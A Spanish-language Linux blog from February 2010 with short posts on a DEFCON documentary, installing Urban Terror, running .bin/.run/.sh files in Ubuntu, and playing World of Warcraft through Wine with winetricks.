¡Lo ejecutaremos y listo para hacer la declaración!

jueves, 4 de febrero de 2010

Cine - Documental DEFCON

La DEFCON es una conferencia de seguridad a nivel internacional donde los mejores expertos en seguridad van a exponer sus conocimientos y algunos de los mejores grupos de hackers van a competir para demostrar sus habilidades. Es un mundo que poca gente conoce por lo que aquí os dejo un documental algo antigüo que explica que se cuece por allí y como empezó:


miércoles, 3 de febrero de 2010

Juegos Linux - Urban Terror


Urban Terror es un juego para Linux basado en el motor del Quake 3. Como el Quake 3 fue liberado, este juego se convirtió en la alternativa gratuita al Counter Strike. En cualquier caso, hoy hablaremos de este juego con buenos gráficos, una aceptable cuota de gente que juega y con un porcentaje de satisfacción por los usuarios bastante alto.

Para instalarlo lo primero que haremos será descargarlo. Para ello he escogido la versión extraíble que funciona tanto en Linux como en Mac (no olvidemos que es multiplataforma).


Para ello ejecutaremos en un terminal:
  • wget ftp://ftp.snt.utwente.nl/pub/games/urbanterror/UrbanTerror_41_FULL.zip
 Una vez descargados los 719 MB, procederemos a extraerlo mediante el comando:
  •  unzip UrbanTerror_41_FULL.zip
Después de extraerlo, procederemos a ejecutar el juego. Para ello iremos a nuestra carpeta de usuario y buscaremos la carpeta UrbanTerror. La abriremos y ejecutaremos el programa según nuestra arquitectura. Si tenemos 32 bits ejecutaremos ioUrbanTerror.i386 y si tenemos 64 bits, ioUrbanTerror.x86_64.
Ejemplo de 32 bits:
  • cd UrbanTerror
  • sudo chmod +x ioUrbanTerror.i386
  • ./ioUrbanTerror.i386

Si te salta algún error de consola diciendo que no se puede ejecutar OpenGL, comprueba que tienes aceleración gráfica. Si aun así no funcionara, verifica que tu tarjeta gráfica este trabajando a  24 bits de color.

Para jugar en modo pantalla vamos a system y en graphics quitamos Fullscreen.
Para crear un acceso directo crearemos un lanzador y en la línea de comando a ejecutar pondremos /home/tusuario/UrbanTerror/ioUrbanTerror.i386

Si no tienes ningún problema, ¡disfruta!

martes, 2 de febrero de 2010

Ubuntu: Ejecutar archivos .bin .run .sh


Muchas veces, algunas aplicaciones vienen en extensión .bin, .run o .sh y los usuarios no saben como ejecutarlas para instalarlas o usarlas. Para ello hoy haremos una guía genérica para ejecutar este tipo de archivos.

Lo primero de todo, supongamos que el fichero está en el Escritorio. Para poder usarlo lo primero que tendremos que hacer será abrir un terminal y escribir:
  • cd Escritorio
  • sudo chmod +x MiFichero.bin.run.sh
  • sudo ./MiFichero.bin.run.sh
Listo, en el mismo terminal nos aparecerá el progreso de la instalación en nuestro equipo.

lunes, 1 de febrero de 2010

Ubuntu - Instalar World of Warcraft


A petición de uno de nuestros lectores woweros, hablaremos de como instalar el conocidísimo juego de masivo de rol multijugador en línea, World Of Warcraft. Si yo estuviera a cargo de la agencia antidroga catalogaría este juego como peor que la heroína. En cualquier caso, hoy hablaremos sobre como ejecutarlo sin problemas.

En esta guía, usaremos una copia del juego ya instalado ya que son famosos los bugs del instalador en Wine. En cualquier caso, prepara tu carpeta de 10 gigas de juego que comienza la fiesta.
Lo primero de todo es instalar wine por si no lo tenías. Para ello ejecutaremos el siguiente comando:
  • sudo apt-get install wine
Tras su instalación, procederemos a configurar los gráficos y el audio. Para ello en el terminal escribiremos:
  • winecfg
Una vez abierto, pulsaremos sobre Audio y lo configuraremos con ALSA:


Después pulsaremos sobre Gráficos y activaremos las siguientes casillas:



Aceptaremos y cerraremos. Una vez configurado, bajaremos el script winetricks que nos ayudará a configurar ciertas cosas de manera muy sencilla. Para ello ejecutaremos el siguiente comando para descargarlo:
  • wget http://www.kegel.com/wine/winetricks
Una vez descargado, le daremos los permisos y lo moveremos a la carpeta de aplicaciones para poder ejecutarlo siempre desde la consola. Para ello ejecutaremos los dos siguientes comandos:
  • sudo chmod +x winetricks
  • sudo mv winetricks /usr/local/bin
 Una vez hecho todo esto ejecutaremos winetricks para que nos instale las fuentes y el directx:
  • winetricks d3dx9 corefonts
Una vez hecho todo esto, iremos a nuestra carpeta de usuario, Lugares > Carpeta Personal, pulsaremos la tecla control + H (para ver los archivos ocultos) e iremos a la carpeta .wine (. delante). Pulsaremos sobre drive_c, luego sobre Archivos De Programa y aquí pegaremos nuestra carpeta con el juego.

Ahora para ejecutarlo, crearemos un lanzador en la barra superior de aplicaciones, pulsando segundo botón , añadir al panel, lanzador de aplicaciones personalizado y rellenaremos los datos con:
Tipo: Aplicación
Nombre: World of Warcraft
Comando: wine "C:\Archivos de programa\World of Warcraft\Wow.exe" -opengl -window
Comentario: Juega al WoW
 Aceptaremos, y pulsaremos sobre el lanzador para ejecutarlo. Si todo ha salido bien, jugaremos al WoW en linux, con más gráficos, más fps y más rendimiento que en su sistema operativo original. Ya no tienes escusa para no pasarte a Linux. ¡Corre la voz!